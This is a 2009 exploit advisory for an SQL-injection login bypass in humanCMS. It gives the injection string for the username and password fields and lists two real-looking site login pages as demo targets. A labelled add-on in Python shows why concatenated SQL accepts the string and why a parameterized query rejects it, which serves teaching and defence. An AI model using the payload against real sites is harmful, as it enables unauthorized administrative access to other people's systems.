# Title : humanCMS (Auth Bypass) SQL Injection Vulnerability
# Published : 2009-08-24
# Author : next


()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
()                                                                                                    ()
()    f KHatr Zfaft Zenta9 f Zfaft Galo ya khir CHirbakhzer                                           ()                                                                                           
()                                                                                                    ()
()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
[+]  humanCMS   (Auth Bypass)  SQL Injection Vulnerability
[+]  Discovered by  next
[+]  www.sa3eka.com   ()()()()()  www.m4r0c-s3curity.cc
[+] vie.0[at]hotmail.com
()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()

[+]  Home Page      :      http://www.squarelabel.com
                           "humanCMS site description"

[+]  Auth Bypass

[+] exploit    :           username :     ' or' 1=1
                           password :      ' or' 1=1

[+] admin login demo :
                           http://www.festivalcite.ch/index.php?id=&action=login
                           http://www.squarelabel.com/index.php?id=&action=login

()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()()
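
Added example, not code from the advisory or from humanCMS: why the login string above passes a concatenated credential check, and how a bound-parameter query rejects it. The query shape, the users table, its columns, the sample row and the function names are assumptions, and an in-memory SQLite database stands in for the CMS backend, which the advisory does not name.

```python
import sqlite3

# The string the advisory gives for both the username and password fields.
PAYLOAD = "' or' 1=1"


def make_db():
    """In-memory stand-in for the CMS user table (constructed sample row)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Plaintext only to mirror the assumed query shape; real systems store hashes.
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db


def login_concatenated(db, username, password):
    """Assumed vulnerable pattern: form input pasted into the SQL text."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None, sql


def login_parameterized(db, username, password):
    """Hardened form: input is bound as data and never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    bypassed, sql = login_concatenated(db, PAYLOAD, PAYLOAD)
    # The injected quotes close each literal early, leaving the bare string
    # ' 1=1' as an OR term; the engine coerces it to the number 1 (true),
    # so the WHERE clause matches every row regardless of credentials.
    print(sql)
    print("concatenated query accepts payload: ", bypassed)
    print("parameterized query accepts payload:", login_parameterized(db, PAYLOAD, PAYLOAD))
```

A useful regression test for a fix is the pair shown here: the advisory's string must fail the login while a valid credential pair still succeeds.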

# www.Syue.com [2009-08-24]